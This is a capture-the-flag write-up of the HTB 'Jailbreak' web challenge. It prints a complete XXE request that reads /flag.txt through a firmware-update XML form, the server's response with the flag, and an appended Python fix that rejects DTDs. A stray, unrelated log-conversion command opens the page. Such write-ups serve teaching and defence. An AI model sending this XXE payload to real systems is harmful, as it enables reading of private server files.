Jailbreak
find . -type f -name '*.evtx' -exec sh -c 'evtx_dump.py "$0" > "$(basename "$0" .evtx).xml"' {} \;
Challenge
- CTF: HTB Business CTF 2024: The Vault of Hope
- Name: Jailbreak
- Category: Web
- Difficulty: Very Easy
- Points: 300
- Description: The crew secures an experimental Pip-Boy from a black market merchant, recognizing its potential to unlock the heavily guarded bunker of Vault 79. Back at their hideout, the hackers and engineers collaborate to jailbreak the device, working meticulously to bypass its sophisticated biometric locks. Using custom firmware and a series of precise modifications, can you bring the device to full operational status in order to pair it with the vault door’s access port. The flag is located in /flag.txt
- Objective: XXE
Writeup
The website has a firmware update form at /rom. It's an XML form, so an XML External Entity (XXE) attack might be relevant for reading a file…

Request:
POST /api/update HTTP/1.1
Host: 94.237.54.65:46621
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://94.237.54.65:46621/rom
Content-Type: application/xml
Content-Length: 1314
Origin: http://94.237.54.65:46621
Connection: keep-alive

<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///flag.txt'>]><FirmwareUpdateConfig>
<Firmware>
<Version>&test;</Version>
<ReleaseDate>2077-10-21</ReleaseDate>
<Description>Update includes advanced biometric lock functionality for enhanced security.</Description>
<Checksum type="SHA-256">9b74c9897bac770ffc029102a200c5de</Checksum>
</Firmware>
<Components>
<Component name="navigation">
<Version>3.7.2</Version>
<Description>Updated GPS algorithms for improved wasteland navigation.</Description>
<Checksum type="SHA-256">e4d909c290d0fb1ca068ffaddf22cbd0</Checksum>
</Component>
<Component name="communication">
<Version>4.5.1</Version>
<Description>Enhanced encryption for secure communication channels.</Description>
<Checksum type="SHA-256">88d862aeb067278155c67a6d6c0f3729</Checksum>
</Component>
<Component name="biometric_security">
<Version>2.0.5</Version>
<Description>Introduces facial recognition and fingerprint scanning for access control.</Description>
<Checksum type="SHA-256">abcdef1234567890abcdef1234567890</Checksum>
</Component>
</Components>
<UpdateURL></UpdateURL>
</FirmwareUpdateConfig>
Response:
HTTP/1.1 200 OK
Server: Werkzeug/3.0.3 Python/3.12.3
Date: Sat, 18 May 2024 16:05:17 GMT
Content-Type: application/json
Content-Length: 130
Connection: close

{
"message": "Firmware version HTB{b1om3tric_l0cks_4nd_fl1cker1ng_l1ghts_30347106c112e3873dacb5b63263ab18} update initiated."
}
Flag: HTB{b1om3tric_l0cks_4nd_fl1cker1ng_l1ghts_30347106c112e3873dacb5b63263ab18}
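The server-side fix for the behaviour shown in the request and response above, as an added example that is not part of the original writeup or the challenge's own code: refuse any upload that carries a DOCTYPE, and validate `Version` before echoing it. The function names, the version pattern and the sample documents are assumptions constructed for illustration; only the Python standard library is used.

```python
import re
import xml.etree.ElementTree as ET
from xml.parsers import expat

class DTDForbidden(ValueError):
    """Raised when an uploaded document carries a DOCTYPE declaration."""

# Assumed version format (dotted numbers); not taken from the challenge.
VERSION_RE = re.compile(r"\d+(\.\d+){0,3}")

def _reject_doctype(name, sysid, pubid, has_internal_subset):
    # Entities, internal or external, can only be declared inside a DTD,
    # so refusing the DOCTYPE removes the XXE surface entirely.
    raise DTDForbidden(f"DOCTYPE {name!r} not allowed in firmware config")

def parse_firmware_version(xml_bytes: bytes) -> str:
    # Pass 1: scan with expat and abort at the first DOCTYPE declaration.
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject_doctype
    scanner.Parse(xml_bytes, True)
    # Pass 2: build the tree only once the document is known to be DTD-free.
    root = ET.fromstring(xml_bytes)
    version = (root.findtext("Firmware/Version") or "").strip()
    # Defence in depth: only a well-formed version string is ever echoed
    # back in the response message.
    if not VERSION_RE.fullmatch(version):
        raise ValueError("Firmware/Version is not a dotted version number")
    return version

def outcome(doc: bytes) -> str:
    """Hypothetical helper: what an /api/update handler would decide."""
    try:
        return "accepted " + parse_firmware_version(doc)
    except DTDForbidden:
        return "rejected: DTD"
    except (ValueError, expat.ExpatError, ET.ParseError):
        return "rejected: invalid"

# Constructed samples modelled on the request shown on this page.
BENIGN = (b"<FirmwareUpdateConfig><Firmware><Version>1.33.7</Version>"
          b"</Firmware></FirmwareUpdateConfig>")
WITH_DTD = (b"<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///flag.txt'>]>"
            b"<FirmwareUpdateConfig><Firmware><Version>&test;</Version>"
            b"</Firmware></FirmwareUpdateConfig>")
BAD_VERSION = (b"<FirmwareUpdateConfig><Firmware><Version>not-a-version"
               b"</Version></Firmware></FirmwareUpdateConfig>")
```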